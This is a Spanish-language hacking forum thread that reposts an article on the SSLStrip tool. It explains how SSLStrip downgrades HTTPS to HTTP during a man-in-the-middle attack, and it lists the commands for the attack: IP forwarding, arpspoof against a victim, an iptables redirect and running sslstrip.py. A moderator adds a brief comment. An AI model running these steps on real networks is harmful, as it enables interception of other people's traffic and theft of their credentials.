Resultados 1 al 2 de 2

Tema: SSLStrip – Espiando tráfico SSL

  1. #1 SSLStrip – Espiando tráfico SSL 
    HH Administrator Avatar de LUK
    Fecha de ingreso
    Oct 2001
    Ubicación
    SpaÑa
    Mensajes
    5.010
    Descargas
    179
    Uploads
    246
    Desde que Moxie Moulinsart mostró su SSLStrip en Blackhat, el MODO PARANOICO de muchas personas quedó encendido y no es para menos, ya que con esta herramienta cualquier persona puede espiar tu trafico SSL sin problemas.

    El funcionamiento de SSLStrip es simple, reemplaza todas las peticiones “https://” de una página web por “http://” y luego hacer un MITM entre el servidor y el cliente. La idea es que la víctima y el agresor se comuniquen a través de HTTP, mientras que el atacante y el servidor, se comunican a través de HTTPS con el certificado del servidor. Por lo tanto, el atacante es capaz de ver todo el tráfico en texto plano de la víctima.


    A continuación les dejo vídeo, donde podemos apreciar en funcionamiento de esta excelente herramienta.

    [YOUTUBE]http://www.youtube.com/watch?v=TJHcfs4inhs[/YOUTUBE]

    En resumen, los pasos serian:

    1. Configurar IP Forwarding:

    echo 1 > /proc/sys/net/ipv4/ip_forward

    2. Realizando ataque ARP MITM entre las 2 maquinas:

    arpspoof -i eth0 -t VICTIMA HOST

    3. Redireccionar trafico con iptables:

    iptables -t nat -A PREROUTING -p tcp –destination-port 80 -j REDIRECT –to-ports 8080

    4. Iniciar SSLStrip en el puerto utilizado

    python sslstrip.py -w archivo

    Espero que les sea de utilidad y no olviden comentar

    Mas Información:
    Pagina Oficial del SSLStrip


    Fuente: http://www.dragonjar.org/sslstrip-es...fico-ssl.xhtml
    [][][] LUK [][][]
    hackhispano.com
    Citar  
     

  2. #2  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Los tres primeros pasos son lo que en esencia hace automáticamente localwebfaker. Este cuarto paso es muy interesante, puesto que la gran mayoría de los usuarios no comprueba si realmente se está haciendo uso de SSL.


    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

Temas similares

  1. ¿Y si el gobierno te estuviera espiando?
    Por 3J Kernel en el foro GENERAL
    Respuestas: 2
    Último mensaje: 30-11-2014, 11:52
  2. Inyeccion de tráfico
    Por biyonder en el foro REDES Y TECNOLOGIAS WIRELESS
    Respuestas: 0
    Último mensaje: 06-10-2009, 22:29
  3. Saturación de tráfico
    Por digitorion en el foro GENERAL
    Respuestas: 2
    Último mensaje: 27-01-2009, 18:25
  4. Trafico y Volumen de red
    Por Arky en el foro REDES Y TECNOLOGIAS WIRELESS
    Respuestas: 7
    Último mensaje: 19-09-2007, 15:11
  5. Trafico de red
    Por sr-cannabis en el foro REDES Y TECNOLOGIAS WIRELESS
    Respuestas: 1
    Último mensaje: 09-10-2006, 15:34

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •